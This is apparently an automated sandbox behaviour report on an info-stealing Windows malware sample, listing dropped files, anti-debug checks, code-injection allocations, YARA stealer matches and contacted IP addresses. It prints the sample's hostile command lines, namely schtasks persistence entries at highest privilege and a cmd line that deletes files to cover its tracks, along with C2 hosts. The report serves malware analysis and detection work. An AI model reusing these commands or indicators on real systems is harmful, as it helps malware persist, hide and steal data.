file	C:\Users\test22\Documents\SimpleAdobe\FjsNdi4kjdtz2qw1MphlaqEs.exe
file	C:\Users\test22\Documents\SimpleAdobe\rYWTjDsqXT4AcDkoeJs_yZP2.exe
file	C:\Users\test22\Documents\SimpleAdobe\d_RIPuBmnjojf5JMU6a5QhMe.exe
file	C:\Users\test22\AppData\Local\Temp\is-8FLUV.tmp\_isetup\_iscrypt.dll
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\123p[1].exe
file	C:\Users\test22\Documents\SimpleAdobe\y0Q2LMuickieMvG8m310BTdg.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\669a659129ee2_crypted[1].exe
file	C:\Users\test22\Documents\SimpleAdobe\_pE7OUzePdg8dQq0bonZyFkX.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\6692518842cd4_BotClient[1].exe
file	C:\Users\test22\AppData\Local\Temp\is-8FLUV.tmp\_isetup\_isdecmp.dll
file	C:\Users\test22\Documents\SimpleAdobe\7CF2bZR8HWtuPTUKAqzCc3OT.exe
file	C:\Users\test22\Documents\SimpleAdobe\nHLIm6xHX7c236uOGqXkdPJG.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\6696621cecc83_crypted[1].exe

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW July 20, 2024, 8:07 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\System32\GroupPolicy filepath: C:\Windows\System32\GroupPolicy	1	1	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk

Creates a suspicious process (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
cmdline	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\BGDGHJEHJJDA" & exit
cmdline	C:\Windows\System32\cmd.exe /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\BGDGHJEHJJDA" & exit

Drops an executable to the user AppData folder (8 events)

file	C:\Users\test22\AppData\Local\Temp\is-8FLUV.tmp\_isetup\_isdecmp.dll
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\669b5b78252ea_googlesoft[1].exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\publicsoft[1].exe
file	C:\Users\test22\AppData\Local\Temp\is-8FLUV.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-L49PN.tmp\_pE7OUzePdg8dQq0bonZyFkX.tmp
file	C:\Users\test22\AppData\Local\Temp\is-8FLUV.tmp\_isetup\_iscrypt.dll
file	C:\Users\test22\AppData\Local\Temp\is-8FLUV.tmp\_isetup\_RegDLL.tmp
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\crt[1].exe

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 2872 thread_handle: 0x000000ec process_identifier: 2860 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000f8	1	1
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 3068 thread_handle: 0x00000258 process_identifier: 3060 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000250	1	1
ShellExecuteExW July 20, 2024, 8:08 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\BGDGHJEHJJDA" & exit filepath: C:\Windows\System32\cmd.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (6 events)

Time & API	Arguments	Status	Return
Process32NextW July 20, 2024, 8:08 p.m.	snapshot_handle: 0x00000564 process_name: pw.exe process_identifier: 2332	1	1
Process32NextW July 20, 2024, 8:08 p.m.	snapshot_handle: 0x00000564 process_name: EN4TCgpUszKEwT9miRPGOajK.exe process_identifier: 2164	1	1
Process32NextW July 20, 2024, 8:08 p.m.	snapshot_handle: 0x00000564 process_name: D_Lr3ok7w7oLDH8Q70lFMUK9.exe process_identifier: 2212	1	1
Process32NextW July 20, 2024, 8:08 p.m.	snapshot_handle: 0x00000564 process_name: MSBuild.exe process_identifier: 2920	1	1
Process32NextW July 20, 2024, 8:08 p.m.	snapshot_handle: 0x00000564 process_name: svchost.exe process_identifier: 2720	1	1
Process32NextW July 20, 2024, 8:08 p.m.	snapshot_handle: 0x00000564 process_name: WmiPrvSE.exe process_identifier: 2192	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 20, 2024, 8:07 p.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x00438a00', u'virtual_address': u'0x003d5000', u'entropy': 7.97096242392736, u'name': u'.vmpVF}A', u'virtual_size': u'0x004389fc'}

entropy

7.97096242393

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x0002ac00', u'virtual_address': u'0x00810000', u'entropy': 6.846931431455256, u'name': u'.rsrc', u'virtual_size': u'0x0002aa94'}

entropy

6.84693143146

description

A section with a high entropy has been found

entropy

0.998111950244

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 20, 2024, 8:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW July 20, 2024, 8:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Expresses interest in specific running processes (1 event)

process

system

Potentially malicious URLs were found in the process memory dump (2 events)

url	https://t.me/s41l0
url	https://steamcommunity.com/profiles/76561199743486170

Yara rule detected in process memory (26 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Client_SW_User_Data_Stealer	rule	Client_SW_User_Data_Stealer
description	ftp clients info stealer	rule	infoStealer_ftpClients_Zero
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Communications over HTTP	rule	Network_HTTP
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Win32 PWS Loki	rule	Win32_PWS_Loki_m_Zero

Queries for potentially installed applications (45 events)

Time & API	Arguments	Status	Return
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Sound Changer Beta_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Sound Changer Beta_is1		2
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Sound Changer Beta_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Sound Changer Beta_is1		2
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Sound Changer Beta_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000008 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Sound Changer Beta_is1		2
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Sound Changer Beta_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000008 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Sound Changer Beta_is1		2
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000564 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sound Changer Beta_is1 base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sound Changer Beta_is1	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x80000002 key_handle: 0x00000574 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1	0
RegOpenKeyExA July 20, 2024, 8:08 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall		2

Terminates another process (10 events)

Time & API	Arguments	Status
NtTerminateProcess July 20, 2024, 8:08 p.m.	status_code: 0xffffffff process_identifier: 2924 process_handle: 0x0000026c
NtTerminateProcess July 20, 2024, 8:08 p.m.	status_code: 0xffffffff process_identifier: 2924 process_handle: 0x0000026c	1
NtTerminateProcess July 20, 2024, 8:08 p.m.	status_code: 0xffffffff process_identifier: 944 process_handle: 0x00000274
NtTerminateProcess July 20, 2024, 8:08 p.m.	status_code: 0xffffffff process_identifier: 944 process_handle: 0x00000274	1
NtTerminateProcess July 20, 2024, 8:08 p.m.	status_code: 0xffffffff process_identifier: 2808 process_handle: 0x0000027c
NtTerminateProcess July 20, 2024, 8:08 p.m.	status_code: 0xffffffff process_identifier: 2808 process_handle: 0x0000027c	1
NtTerminateProcess July 20, 2024, 8:08 p.m.	status_code: 0xffffffff process_identifier: 1780 process_handle: 0x0000028c
NtTerminateProcess July 20, 2024, 8:08 p.m.	status_code: 0xffffffff process_identifier: 1780 process_handle: 0x0000028c	1
NtTerminateProcess July 20, 2024, 8:08 p.m.	status_code: 0xffffffff process_identifier: 2668 process_handle: 0x00000294
NtTerminateProcess July 20, 2024, 8:08 p.m.	status_code: 0xffffffff process_identifier: 2668 process_handle: 0x00000294	1

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
cmdline	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\BGDGHJEHJJDA" & exit
cmdline	C:\Windows\System32\cmd.exe /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\BGDGHJEHJJDA" & exit

The executable is likely packed with VMProtect (3 events)

section	.vmpVF}A	description	Section name indicates VMProtect
section	.vmpVF}A	description	Section name indicates VMProtect
section	.vmpVF}A	description	Section name indicates VMProtect

Communicates with host for which no DNS query was performed (7 events)

host	176.111.174.109
host	77.105.133.27
host	78.46.255.249
host	79.137.192.13
host	89.111.172.64
host	91.103.252.177
host	94.232.45.38

Allocates execute permission to another process indicative of possible code injection (6 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 2924 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000264		3221225496
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 944 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000268		3221225496
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 2808 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000270		3221225496
